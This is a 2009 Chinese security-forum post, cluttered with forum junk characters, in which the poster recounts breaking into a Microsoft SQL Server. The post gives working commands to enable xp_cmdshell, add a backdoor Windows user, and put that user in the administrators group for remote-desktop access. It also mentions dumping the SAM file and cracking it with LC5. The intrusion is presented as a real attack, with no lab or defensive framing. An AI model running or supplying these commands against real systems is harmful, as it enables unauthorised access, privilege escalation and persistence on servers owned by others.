返回列表 发帖
本帖最后由 saitojie 于 2009-6-10 17:12 编辑
+ V9 \4 c; w" B- ]  d
. M* b4 B2 ]# _1 E% s  t
+ X; t  e- T9 G0 N0 R6 j于是开始找开启语句,对mssql的玩的少,不是太熟悉!' I; T; \& m: |# i
后来二少给我了语句,便去继续日之( X& }/ z7 W  T5 E, F  i
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
+ s' G  @' O& w0 [1为开启,0则为关闭!
* B7 B: O9 m0 @" `- S# a8 A然后执行& n8 X0 s, x7 @8 w; ^2 n
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c net user xx xx /add'* y' Q( i; x1 R& |5 u7 f/ ~4 X
即可% A- z) u4 R0 g. j( k. a, X0 _( M
回过头去看看,发现用户已经成功添加上了!$ p. B; W% T% a8 [0 s1 b
& G  Z1 q9 F6 L  W& g1 I+ z
我就不明白BKK了,这个地方,你都已经加上用户了,为什么不直接加入到管理组里面,连接服务器的3389呢,为什么还要去下他的SAM,还用LC5去爆力破解呢!~~~~不明白!~~~- ]9 @( Z  w8 y2 h* [( y" @
EXEC [master].[dbo].[xp_cmdshell] 'net localgroup administrators username /add',难道是因为他的3389做了登陆用户的限制?
阿呆主站:CISP中国网
注册信息安全专业人员资质认证(CISP)资料,心得以及备考指南。
阿呆的BLOG:北京SEO
这里时刻记录着阿呆在学习SEO及网络安全过程中的点点滴滴!

TOP

返回列表